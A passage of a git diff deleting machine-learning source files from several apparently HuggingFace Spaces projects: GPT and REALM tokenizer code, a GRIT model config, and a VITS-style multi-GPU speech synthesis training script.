a "chinese character" as anything in the CJK Unicode block: - # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block) - # - # Note that the CJK Unicode block is NOT all Japanese and Korean characters, - # despite its name. The modern Korean Hangul alphabet is a different block, - # as is Japanese Hiragana and Katakana. Those alphabets are used to write - # space-separated words, so they are not treated specially and handled - # like the all of the other languages. - if ( - (cp >= 0x4E00 and cp <= 0x9FFF) - or (cp >= 0x3400 and cp <= 0x4DBF) # - or (cp >= 0x20000 and cp <= 0x2A6DF) # - or (cp >= 0x2A700 and cp <= 0x2B73F) # - or (cp >= 0x2B740 and cp <= 0x2B81F) # - or (cp >= 0x2B820 and cp <= 0x2CEAF) # - or (cp >= 0xF900 and cp <= 0xFAFF) - or (cp >= 0x2F800 and cp <= 0x2FA1F) # - ): # - return True - - return False - - def _clean_text(self, text): - """Performs invalid character removal and whitespace cleanup on text.""" - output = [] - for char in text: - cp = ord(char) - if cp == 0 or cp == 0xFFFD or _is_control(char): - continue - if _is_whitespace(char): - output.append(" ") - else: - output.append(char) - return "".join(output) - - -def get_pairs(word): - """ - Return set of symbol pairs in a word. word is represented as tuple of symbols (symbols being variable-length - strings) - """ - pairs = set() - prev_char = word[0] - for char in word[1:]: - pairs.add((prev_char, char)) - prev_char = char - return pairs - - -def text_standardize(text): - """ - fixes some issues the spacy tokenizer had on books corpus also does some whitespace standardization - """ - text = text.replace("—", "-") - text = text.replace("–", "-") - text = text.replace("―", "-") - text = text.replace("…", "...") - text = text.replace("´", "'") - text = re.sub(r"""(-+|~+|!+|"+|;+|\?+|\++|,+|\)+|\(+|\\+|\/+|\*+|\[+|\]+|}+|{+|\|+|_+)""", r" \1 ", text) - text = re.sub(r"\s*\n\s*", " \n ", text) - text = re.sub(r"[^\S\n]+", " ", text) - return text.strip() - - -class OpenAIGPTTokenizer(PreTrainedTokenizer): - """ - Construct a GPT Tokenizer. Based on Byte-Pair-Encoding with the following peculiarities: - - - lowercases all inputs, - - uses `SpaCy` tokenizer and `ftfy` for pre-BPE tokenization if they are installed, fallback to BERT's - `BasicTokenizer` if not. - - This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to - this superclass for more information regarding those methods. - - Args: - vocab_file (`str`): - Path to the vocabulary file. - merges_file (`str`): - Path to the merges file. - unk_token (`str`, *optional*, defaults to `""`): - The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this - token instead. - """ - - vocab_files_names = VOCAB_FILES_NAMES - pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP - max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES - model_input_names = ["input_ids", "attention_mask"] - - def __init__(self, vocab_file, merges_file, unk_token="", **kwargs): - try: - import ftfy - from spacy.lang.en import English - - _nlp = English() - self.nlp = _nlp.tokenizer - self.fix_text = ftfy.fix_text - except ImportError: - logger.warning("ftfy or spacy is not installed using BERT BasicTokenizer instead of SpaCy & ftfy.") - self.nlp = BasicTokenizer(do_lower_case=True) - self.fix_text = None - - with open(vocab_file, encoding="utf-8") as vocab_handle: - self.encoder = json.load(vocab_handle) - self.decoder = {v: k for k, v in self.encoder.items()} - with open(merges_file, encoding="utf-8") as merges_handle: - merges = merges_handle.read().split("\n")[1:-1] - merges = [tuple(merge.split()) for merge in merges] - self.bpe_ranks = dict(zip(merges, range(len(merges)))) - self.cache = {} - - super().__init__(unk_token=unk_token, **kwargs) - - @property - def do_lower_case(self): - return True - - @property - def vocab_size(self): - return len(self.encoder) - - def get_vocab(self): - return dict(self.encoder, **self.added_tokens_encoder) - - def bpe(self, token): - word = tuple(token[:-1]) + (token[-1] + "",) - if token in self.cache: - return self.cache[token] - pairs = get_pairs(word) - - if not pairs: - return token + "" - - while True: - bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf"))) - if bigram not in self.bpe_ranks: - break - first, second = bigram - new_word = [] - i = 0 - while i < len(word): - try: - j = word.index(first, i) - except ValueError: - new_word.extend(word[i:]) - break - else: - new_word.extend(word[i:j]) - i = j - - if word[i] == first and i < len(word) - 1 and word[i + 1] == second: - new_word.append(first + second) - i += 2 - else: - new_word.append(word[i]) - i += 1 - new_word = tuple(new_word) - word = new_word - if len(word) == 1: - break - else: - pairs = get_pairs(word) - word = " ".join(word) - if word == "\n ": - word = "\n" - self.cache[token] = word - return word - - def _tokenize(self, text): - """Tokenize a string.""" - split_tokens = [] - if self.fix_text is None: - # Using BERT's BasicTokenizer - text = self.nlp.tokenize(text) - for token in text: - split_tokens.extend(list(self.bpe(token).split(" "))) - else: - # Using SpaCy & ftfy (original tokenization process of OpenAI GPT) - text = self.nlp(text_standardize(self.fix_text(text))) - for token in text: - split_tokens.extend(list(self.bpe(token.text.lower()).split(" "))) - return split_tokens - - def _convert_token_to_id(self, token): - """Converts a token (str) in an id using the vocab.""" - return self.encoder.get(token, self.encoder.get(self.unk_token)) - - def _convert_id_to_token(self, index): - """Converts an id in a token (BPE) using the vocab.""" - return self.decoder.get(index, self.unk_token) - - def convert_tokens_to_string(self, tokens): - """Converts a sequence of tokens (string) in a single string.""" - out_string = "".join(tokens).replace("", " ").strip() - return out_string - - def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]: - if not os.path.isdir(save_directory): - logger.error(f"Vocabulary path ({save_directory}) should be a directory") - return - vocab_file = os.path.join( - save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"] - ) - merge_file = os.path.join( - save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"] - ) - - with open(vocab_file, "w", encoding="utf-8") as f: - f.write(json.dumps(self.encoder, indent=2, sort_keys=True, ensure_ascii=False) + "\n") - - index = 0 - with open(merge_file, "w", encoding="utf-8") as writer: - writer.write("#version: 0.2\n") - for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]): - if index != token_index: - logger.warning( - f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive." - " Please check that the tokenizer is not corrupted!" - ) - index = token_index - writer.write(" ".join(bpe_tokens) + "\n") - index += 1 - - return vocab_file, merge_file diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/realm/tokenization_realm_fast.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/realm/tokenization_realm_fast.py deleted file mode 100644 index 59b23f45ee0b30e842ffcd9aeed158927bba6dbf..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/realm/tokenization_realm_fast.py +++ /dev/null @@ -1,321 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The REALM authors and The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""Fast Tokenization classes for REALM.""" - -import json -from typing import List, Optional, Tuple - -from tokenizers import normalizers - -from ...tokenization_utils_base import BatchEncoding -from ...tokenization_utils_fast import PreTrainedTokenizerFast -from ...utils import PaddingStrategy, logging -from .tokenization_realm import RealmTokenizer - - -logger = logging.get_logger(__name__) - -VOCAB_FILES_NAMES = {"vocab_file": "vocab.txt", "tokenizer_file": "tokenizer.json"} - -PRETRAINED_VOCAB_FILES_MAP = { - "vocab_file": { - "google/realm-cc-news-pretrained-embedder": ( - "https://huggingface.co/google/realm-cc-news-pretrained-embedder/resolve/main/vocab.txt" - ), - "google/realm-cc-news-pretrained-encoder": ( - "https://huggingface.co/google/realm-cc-news-pretrained-encoder/resolve/main/vocab.txt" - ), - "google/realm-cc-news-pretrained-scorer": ( - "https://huggingface.co/google/realm-cc-news-pretrained-scorer/resolve/main/vocab.txt" - ), - "google/realm-cc-news-pretrained-openqa": ( - "https://huggingface.co/google/realm-cc-news-pretrained-openqa/aresolve/main/vocab.txt" - ), - "google/realm-orqa-nq-openqa": "https://huggingface.co/google/realm-orqa-nq-openqa/resolve/main/vocab.txt", - "google/realm-orqa-nq-reader": "https://huggingface.co/google/realm-orqa-nq-reader/resolve/main/vocab.txt", - "google/realm-orqa-wq-openqa": "https://huggingface.co/google/realm-orqa-wq-openqa/resolve/main/vocab.txt", - "google/realm-orqa-wq-reader": "https://huggingface.co/google/realm-orqa-wq-reader/resolve/main/vocab.txt", - }, - "tokenizer_file": { - "google/realm-cc-news-pretrained-embedder": ( - "https://huggingface.co/google/realm-cc-news-pretrained-embedder/resolve/main/tokenizer.jsont" - ), - "google/realm-cc-news-pretrained-encoder": ( - "https://huggingface.co/google/realm-cc-news-pretrained-encoder/resolve/main/tokenizer.json" - ), - "google/realm-cc-news-pretrained-scorer": ( - "https://huggingface.co/google/realm-cc-news-pretrained-scorer/resolve/main/tokenizer.json" - ), - "google/realm-cc-news-pretrained-openqa": ( - "https://huggingface.co/google/realm-cc-news-pretrained-openqa/aresolve/main/tokenizer.json" - ), - "google/realm-orqa-nq-openqa": ( - "https://huggingface.co/google/realm-orqa-nq-openqa/resolve/main/tokenizer.json" - ), - "google/realm-orqa-nq-reader": ( - "https://huggingface.co/google/realm-orqa-nq-reader/resolve/main/tokenizer.json" - ), - "google/realm-orqa-wq-openqa": ( - "https://huggingface.co/google/realm-orqa-wq-openqa/resolve/main/tokenizer.json" - ), - "google/realm-orqa-wq-reader": ( - "https://huggingface.co/google/realm-orqa-wq-reader/resolve/main/tokenizer.json" - ), - }, -} - -PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = { - "google/realm-cc-news-pretrained-embedder": 512, - "google/realm-cc-news-pretrained-encoder": 512, - "google/realm-cc-news-pretrained-scorer": 512, - "google/realm-cc-news-pretrained-openqa": 512, - "google/realm-orqa-nq-openqa": 512, - "google/realm-orqa-nq-reader": 512, - "google/realm-orqa-wq-openqa": 512, - "google/realm-orqa-wq-reader": 512, -} - -PRETRAINED_INIT_CONFIGURATION = { - "google/realm-cc-news-pretrained-embedder": {"do_lower_case": True}, - "google/realm-cc-news-pretrained-encoder": {"do_lower_case": True}, - "google/realm-cc-news-pretrained-scorer": {"do_lower_case": True}, - "google/realm-cc-news-pretrained-openqa": {"do_lower_case": True}, - "google/realm-orqa-nq-openqa": {"do_lower_case": True}, - "google/realm-orqa-nq-reader": {"do_lower_case": True}, - "google/realm-orqa-wq-openqa": {"do_lower_case": True}, - "google/realm-orqa-wq-reader": {"do_lower_case": True}, -} - - -class RealmTokenizerFast(PreTrainedTokenizerFast): - r""" - Construct a "fast" REALM tokenizer (backed by HuggingFace's *tokenizers* library). Based on WordPiece. - - [`RealmTokenizerFast`] is identical to [`BertTokenizerFast`] and runs end-to-end tokenization: punctuation - splitting and wordpiece. - - This tokenizer inherits from [`PreTrainedTokenizerFast`] which contains most of the main methods. Users should - refer to this superclass for more information regarding those methods. - - Args: - vocab_file (`str`): - File containing the vocabulary. - do_lower_case (`bool`, *optional*, defaults to `True`): - Whether or not to lowercase the input when tokenizing. - unk_token (`str`, *optional*, defaults to `"[UNK]"`): - The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this - token instead. - sep_token (`str`, *optional*, defaults to `"[SEP]"`): - The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for - sequence classification or for a text and a question for question answering. It is also used as the last - token of a sequence built with special tokens. - pad_token (`str`, *optional*, defaults to `"[PAD]"`): - The token used for padding, for example when batching sequences of different lengths. - cls_token (`str`, *optional*, defaults to `"[CLS]"`): - The classifier token which is used when doing sequence classification (classification of the whole sequence - instead of per-token classification). It is the first token of the sequence when built with special tokens. - mask_token (`str`, *optional*, defaults to `"[MASK]"`): - The token used for masking values. This is the token used when training this model with masked language - modeling. This is the token which the model will try to predict. - clean_text (`bool`, *optional*, defaults to `True`): - Whether or not to clean the text before tokenization by removing any control characters and replacing all - whitespaces by the classic one. - tokenize_chinese_chars (`bool`, *optional*, defaults to `True`): - Whether or not to tokenize Chinese characters. This should likely be deactivated for Japanese (see [this - issue](https://github.com/huggingface/transformers/issues/328)). - strip_accents (`bool`, *optional*): - Whether or not to strip all accents. If this option is not specified, then it will be determined by the - value for `lowercase` (as in the original BERT). - wordpieces_prefix (`str`, *optional*, defaults to `"##"`): - The prefix for subwords. - """ - - vocab_files_names = VOCAB_FILES_NAMES - pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP - pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION - max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES - slow_tokenizer_class = RealmTokenizer - - def __init__( - self, - vocab_file=None, - tokenizer_file=None, - do_lower_case=True, - unk_token="[UNK]", - sep_token="[SEP]", - pad_token="[PAD]", - cls_token="[CLS]", - mask_token="[MASK]", - tokenize_chinese_chars=True, - strip_accents=None, - **kwargs, - ): - super().__init__( - vocab_file, - tokenizer_file=tokenizer_file, - do_lower_case=do_lower_case, - unk_token=unk_token, - sep_token=sep_token, - pad_token=pad_token, - cls_token=cls_token, - mask_token=mask_token, - tokenize_chinese_chars=tokenize_chinese_chars, - strip_accents=strip_accents, - **kwargs, - ) - - normalizer_state = json.loads(self.backend_tokenizer.normalizer.__getstate__()) - if ( - normalizer_state.get("lowercase", do_lower_case) != do_lower_case - or normalizer_state.get("strip_accents", strip_accents) != strip_accents - or normalizer_state.get("handle_chinese_chars", tokenize_chinese_chars) != tokenize_chinese_chars - ): - normalizer_class = getattr(normalizers, normalizer_state.pop("type")) - normalizer_state["lowercase"] = do_lower_case - normalizer_state["strip_accents"] = strip_accents - normalizer_state["handle_chinese_chars"] = tokenize_chinese_chars - self.backend_tokenizer.normalizer = normalizer_class(**normalizer_state) - - self.do_lower_case = do_lower_case - - def batch_encode_candidates(self, text, **kwargs): - r""" - Encode a batch of text or text pair. This method is similar to regular __call__ method but has the following - differences: - - 1. Handle additional num_candidate axis. (batch_size, num_candidates, text) - 2. Always pad the sequences to *max_length*. - 3. Must specify *max_length* in order to stack packs of candidates into a batch. - - - single sequence: `[CLS] X [SEP]` - - pair of sequences: `[CLS] A [SEP] B [SEP]` - - Args: - text (`List[List[str]]`): - The batch of sequences to be encoded. Each sequence must be in this format: (batch_size, - num_candidates, text). - text_pair (`List[List[str]]`, *optional*): - The batch of sequences to be encoded. Each sequence must be in this format: (batch_size, - num_candidates, text). - **kwargs: - Keyword arguments of the __call__ method. - - Returns: - [`BatchEncoding`]: Encoded text or text pair. - - Example: - - ```python - >>> from transformers import RealmTokenizerFast - - >>> # batch_size = 2, num_candidates = 2 - >>> text = [["Hello world!", "Nice to meet you!"], ["The cute cat.", "The adorable dog."]] - - >>> tokenizer = RealmTokenizerFast.from_pretrained("google/realm-cc-news-pretrained-encoder") - >>> tokenized_text = tokenizer.batch_encode_candidates(text, max_length=10, return_tensors="pt") - ```""" - - # Always using a fixed sequence length to encode in order to stack candidates into a batch. - kwargs["padding"] = PaddingStrategy.MAX_LENGTH - - batch_text = text - batch_text_pair = kwargs.pop("text_pair", None) - return_tensors = kwargs.pop("return_tensors", None) - - output_data = { - "input_ids": [], - "attention_mask": [], - "token_type_ids": [], - } - - for idx, candidate_text in enumerate(batch_text): - if batch_text_pair is not None: - candidate_text_pair = batch_text_pair[idx] - else: - candidate_text_pair = None - - encoded_candidates = super().__call__(candidate_text, candidate_text_pair, return_tensors=None, **kwargs) - - encoded_input_ids = encoded_candidates.get("input_ids") - encoded_attention_mask = encoded_candidates.get("attention_mask") - encoded_token_type_ids = encoded_candidates.get("token_type_ids") - - if encoded_input_ids is not None: - output_data["input_ids"].append(encoded_input_ids) - if encoded_attention_mask is not None: - output_data["attention_mask"].append(encoded_attention_mask) - if encoded_token_type_ids is not None: - output_data["token_type_ids"].append(encoded_token_type_ids) - - output_data = {key: item for key, item in output_data.items() if len(item) != 0} - - return BatchEncoding(output_data, tensor_type=return_tensors) - - def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None): - """ - Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and - adding special tokens. A REALM sequence has the following format: - - - single sequence: `[CLS] X [SEP]` - - pair of sequences: `[CLS] A [SEP] B [SEP]` - - Args: - token_ids_0 (`List[int]`): - List of IDs to which the special tokens will be added. - token_ids_1 (`List[int]`, *optional*): - Optional second list of IDs for sequence pairs. - - Returns: - `List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens. - """ - output = [self.cls_token_id] + token_ids_0 + [self.sep_token_id] - - if token_ids_1 is not None: - output += token_ids_1 + [self.sep_token_id] - - return output - - def create_token_type_ids_from_sequences( - self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None - ) -> List[int]: - """ - Create a mask from the two sequences passed to be used in a sequence-pair classification task. A REALM sequence - pair mask has the following format: - - ``` - 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 - | first sequence | second sequence | - ``` - - If `token_ids_1` is `None`, this method only returns the first portion of the mask (0s). - - Args: - token_ids_0 (`List[int]`): - List of IDs. - token_ids_1 (`List[int]`, *optional*): - Optional second list of IDs for sequence pairs. - - Returns: - `List[int]`: List of [token type IDs](../glossary#token-type-ids) according to the given sequence(s). - """ - sep = [self.sep_token_id] - cls = [self.cls_token_id] - if token_ids_1 is None: - return len(cls + token_ids_0 + sep) * [0] - return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1] - - def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]: - files = self._tokenizer.model.save(save_directory, name=filename_prefix) - return tuple(files) diff --git a/spaces/ynhe/AskAnything/models/grit_src/grit/config.py b/spaces/ynhe/AskAnything/models/grit_src/grit/config.py deleted file mode 100644 index fabe7f0fbe1e41c6eb280f8f7d6ae2e9c4911135..0000000000000000000000000000000000000000 --- a/spaces/ynhe/AskAnything/models/grit_src/grit/config.py +++ /dev/null @@ -1,50 +0,0 @@ -from detectron2.config import CfgNode as CN - - -def add_grit_config(cfg): - _C = cfg - - _C.MODEL.BEAM_SIZE = 1 - _C.MODEL.TRAIN_TASK = ["ObjectDet", "DenseCap"] - _C.MODEL.TEST_TASK = "DenseCap" # This can be varied if the model is jointly trained on multiple tasks - - _C.MODEL.ROI_BOX_HEAD.USE_BIAS = 0.0 # >= 0: not use - _C.MODEL.ROI_BOX_HEAD.MULT_PROPOSAL_SCORE = False - - _C.MODEL.ROI_HEADS.MASK_WEIGHT = 1.0 - _C.MODEL.ROI_HEADS.OBJECT_FEAT_POOLER_RES = 14 - _C.MODEL.ROI_HEADS.SOFT_NMS_ENABLED = False - - # Backbones - _C.MODEL.VIT_LAYERS = 12 - - # Text Decoder - _C.TEXT_DECODER = CN() - _C.TEXT_DECODER.VOCAB_SIZE = 30522 - _C.TEXT_DECODER.HIDDEN_SIZE = 768 - _C.TEXT_DECODER.NUM_LAYERS = 6 - _C.TEXT_DECODER.ATTENTION_HEADS = 12 - _C.TEXT_DECODER.FEEDFORWARD_SIZE = 768 * 4 - - # Multi-dataset dataloader - _C.DATALOADER.DATASET_RATIO = [1, 1] # sample ratio - _C.DATALOADER.DATASET_BS = 1 - _C.DATALOADER.DATASET_INPUT_SIZE = [1024, 1024] - _C.DATALOADER.DATASET_INPUT_SCALE = [(0.1, 2.0), (0.1, 2.0)] - _C.DATALOADER.DATASET_MIN_SIZES = [(640, 800), (640, 800)] - _C.DATALOADER.DATASET_MAX_SIZES = [1333, 1333] - - _C.SOLVER.USE_CUSTOM_SOLVER = True - _C.SOLVER.OPTIMIZER = 'ADAMW' - _C.SOLVER.VIT_LAYER_DECAY = True - _C.SOLVER.VIT_LAYER_DECAY_RATE = 0.7 - - _C.INPUT.CUSTOM_AUG = 'EfficientDetResizeCrop' - _C.INPUT.TRAIN_SIZE = 1024 - _C.INPUT.TEST_SIZE = 1024 - _C.INPUT.SCALE_RANGE = (0.1, 2.) - # 'default' for fixed short / long edge - _C.INPUT.TEST_INPUT_TYPE = 'default' - - _C.FIND_UNUSED_PARAM = True - _C.USE_ACT_CHECKPOINT = True \ No newline at end of file diff --git a/spaces/yo2266911/uma_voice/train_ms.py b/spaces/yo2266911/uma_voice/train_ms.py deleted file mode 100644 index 83f19c8c4fe64fd84a3bcb62ed06e673b6833e07..0000000000000000000000000000000000000000 --- a/spaces/yo2266911/uma_voice/train_ms.py +++ /dev/null @@ -1,306 +0,0 @@ -import os -import json -import argparse -import itertools -import math -import torch -from torch import nn, optim -from torch.nn import functional as F -from torch.utils.data import DataLoader -from torch.utils.tensorboard import SummaryWriter -import torch.multiprocessing as mp -import torch.distributed as dist -from torch.nn.parallel import DistributedDataParallel as DDP -from torch.cuda.amp import autocast, GradScaler -from tqdm import tqdm - -import librosa -import logging - -logging.getLogger('numba').setLevel(logging.WARNING) - -import commons -import utils -from data_utils import ( - TextAudioSpeakerLoader, - TextAudioSpeakerCollate, - DistributedBucketSampler -) -from models import ( - SynthesizerTrn, - MultiPeriodDiscriminator, -) -from losses import ( - generator_loss, - discriminator_loss, - feature_loss, - kl_loss -) -from mel_processing import mel_spectrogram_torch, spec_to_mel_torch -from text.symbols import symbols - - -torch.backends.cudnn.benchmark = True -global_step = 0 - - -def main(): - """Assume Single Node Multi GPUs Training Only""" - assert torch.cuda.is_available(), "CPU training is not allowed." - - n_gpus = torch.cuda.device_count() - os.environ['MASTER_ADDR'] = 'localhost' - os.environ['MASTER_PORT'] = '8000' - - hps = utils.get_hparams() - mp.spawn(run, nprocs=n_gpus, args=(n_gpus, hps,)) - - -def run(rank, n_gpus, hps): - global global_step - if rank == 0: - logger = utils.get_logger(hps.model_dir) - logger.info(hps) - utils.check_git_hash(hps.model_dir) - writer = SummaryWriter(log_dir=hps.model_dir) - writer_eval = SummaryWriter(log_dir=os.path.join(hps.model_dir, "eval")) - - dist.init_process_group(backend='nccl', init_method='env://', world_size=n_gpus, rank=rank) - torch.manual_seed(hps.train.seed) - torch.cuda.set_device(rank) - - train_dataset = TextAudioSpeakerLoader(hps.data.training_files, hps.data) - train_sampler = DistributedBucketSampler( - train_dataset, - hps.train.batch_size, - [32,300,400,500,600,700,800,900,1000], - num_replicas=n_gpus, - rank=rank, - shuffle=True) - collate_fn = TextAudioSpeakerCollate() - train_loader = DataLoader(train_dataset, num_workers=0, shuffle=False, pin_memory=True, - collate_fn=collate_fn, batch_sampler=train_sampler) - if rank == 0: - eval_dataset = TextAudioSpeakerLoader(hps.data.validation_files, hps.data) - eval_loader = DataLoader(eval_dataset, num_workers=0, shuffle=False, - batch_size=hps.train.batch_size, pin_memory=True, - drop_last=False, collate_fn=collate_fn) - - net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - n_speakers=hps.data.n_speakers, - **hps.model).cuda(rank) - net_d = MultiPeriodDiscriminator(hps.model.use_spectral_norm).cuda(rank) - optim_g = torch.optim.AdamW( - net_g.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - optim_d = torch.optim.AdamW( - net_d.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - net_g = DDP(net_g, device_ids=[rank]) - net_d = DDP(net_d, device_ids=[rank]) - - try: - _, _, _, epoch_str = utils.load_checkpoint(hps.model_dir.strip("./drive/MyDrive\\"), net_g, None) - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "D_*.pth"), net_d, optim_d) - global_step = (epoch_str - 1) * len(train_loader) - except: - epoch_str = 1 - global_step = 0 - - scheduler_g = torch.optim.lr_scheduler.ExponentialLR(optim_g, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - scheduler_d = torch.optim.lr_scheduler.ExponentialLR(optim_d, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - - scaler = GradScaler(enabled=hps.train.fp16_run) - - for epoch in range(epoch_str, hps.train.epochs + 1): - if rank==0: - train_and_evaluate(rank, epoch, hps, [net_g, net_d], [optim_g, optim_d], [scheduler_g, scheduler_d], scaler, [train_loader, eval_loader], logger, [writer, writer_eval]) - else: - train_and_evaluate(rank, epoch, hps, [net_g, net_d], [optim_g, optim_d], [scheduler_g, scheduler_d], scaler, [train_loader, None], None, None) - scheduler_g.step() - scheduler_d.step() - - -def train_and_evaluate(rank, epoch, hps, nets, optims, schedulers, scaler, loaders, logger, writers): - net_g, net_d = nets - optim_g, optim_d = optims - scheduler_g, scheduler_d = schedulers - train_loader, eval_loader = loaders - if writers is not None: - writer, writer_eval = writers - - train_loader.batch_sampler.set_epoch(epoch) - global global_step - - net_g.train() - net_d.train() - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, speakers) in enumerate(tqdm(train_loader)): - x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True) - spec, spec_lengths = spec.cuda(rank, non_blocking=True), spec_lengths.cuda(rank, non_blocking=True) - y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True) - speakers = speakers.cuda(rank, non_blocking=True) - - with autocast(enabled=hps.train.fp16_run): - y_hat, l_length, attn, ids_slice, x_mask, z_mask,\ - (z, z_p, m_p, logs_p, m_q, logs_q) = net_g(x, x_lengths, spec, spec_lengths, speakers) - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_mel = commons.slice_segments(mel, ids_slice, hps.train.segment_size // hps.data.hop_length) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - - y = commons.slice_segments(y, ids_slice * hps.data.hop_length, hps.train.segment_size) # slice - - # Discriminator - y_d_hat_r, y_d_hat_g, _, _ = net_d(y, y_hat.detach()) - with autocast(enabled=False): - loss_disc, losses_disc_r, losses_disc_g = discriminator_loss(y_d_hat_r, y_d_hat_g) - loss_disc_all = loss_disc - optim_d.zero_grad() - scaler.scale(loss_disc_all).backward() - scaler.unscale_(optim_d) - grad_norm_d = commons.clip_grad_value_(net_d.parameters(), None) - scaler.step(optim_d) - - with autocast(enabled=hps.train.fp16_run): - # Generator - y_d_hat_r, y_d_hat_g, fmap_r, fmap_g = net_d(y, y_hat) - with autocast(enabled=False): - loss_dur = torch.sum(l_length.float()) - loss_mel = F.l1_loss(y_mel, y_hat_mel) * hps.train.c_mel - loss_kl = kl_loss(z_p, logs_q, m_p, logs_p, z_mask) * hps.train.c_kl - - loss_fm = feature_loss(fmap_r, fmap_g) - loss_gen, losses_gen = generator_loss(y_d_hat_g) - loss_gen_all = loss_gen + loss_fm + loss_mel + loss_dur + loss_kl - optim_g.zero_grad() - scaler.scale(loss_gen_all).backward() - scaler.unscale_(optim_g) - grad_norm_g = commons.clip_grad_value_(net_g.parameters(), None) - scaler.step(optim_g) - scaler.update() - - if rank==0: - if global_step % hps.train.log_interval == 0: - lr = optim_g.param_groups[0]['lr'] - losses = [loss_disc, loss_gen, loss_fm, loss_mel, loss_dur, loss_kl] - logger.info('Train Epoch: {} [{:.0f}%]'.format( - epoch, - 100. * batch_idx / len(train_loader))) - logger.info([x.item() for x in losses] + [global_step, lr]) - - scalar_dict = {"loss/g/total": loss_gen_all, "loss/d/total": loss_disc_all, "learning_rate": lr, "grad_norm_d": grad_norm_d, "grad_norm_g": grad_norm_g} - scalar_dict.update({"loss/g/fm": loss_fm, "loss/g/mel": loss_mel, "loss/g/dur": loss_dur, "loss/g/kl": loss_kl}) - - scalar_dict.update({"loss/g/{}".format(i): v for i, v in enumerate(losses_gen)}) - scalar_dict.update({"loss/d_r/{}".format(i): v for i, v in enumerate(losses_disc_r)}) - scalar_dict.update({"loss/d_g/{}".format(i): v for i, v in enumerate(losses_disc_g)}) - image_dict = { - "slice/mel_org": utils.plot_spectrogram_to_numpy(y_mel[0].data.cpu().numpy()), - "slice/mel_gen": utils.plot_spectrogram_to_numpy(y_hat_mel[0].data.cpu().numpy()), - "all/mel": utils.plot_spectrogram_to_numpy(mel[0].data.cpu().numpy()), - "all/attn": utils.plot_alignment_to_numpy(attn[0,0].data.cpu().numpy()) - } - utils.summarize( - writer=writer, - global_step=global_step, - images=image_dict, - scalars=scalar_dict) - - if global_step % hps.train.eval_interval == 0: - evaluate(hps, net_g, eval_loader, writer_eval) - utils.save_checkpoint(net_g, optim_g, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "G_{}.pth".format(global_step))) - utils.save_checkpoint(net_d, optim_d, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "D_{}.pth".format(global_step))) - old_g=os.path.join(hps.model_dir, "G_{}.pth".format(global_step-2000)) - old_d=os.path.join(hps.model_dir, "D_{}.pth".format(global_step-2000)) - if os.path.exists(old_g): - os.remove(old_g) - if os.path.exists(old_d): - os.remove(old_d) - global_step += 1 - - if rank == 0: - logger.info('====> Epoch: {}'.format(epoch)) - - -def evaluate(hps, generator, eval_loader, writer_eval): - generator.eval() - with torch.no_grad(): - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, speakers) in enumerate(eval_loader): - x, x_lengths = x.cuda(0), x_lengths.cuda(0) - spec, spec_lengths = spec.cuda(0), spec_lengths.cuda(0) - y, y_lengths = y.cuda(0), y_lengths.cuda(0) - speakers = speakers.cuda(0) - - # remove else - x = x[:1] - x_lengths = x_lengths[:1] - spec = spec[:1] - spec_lengths = 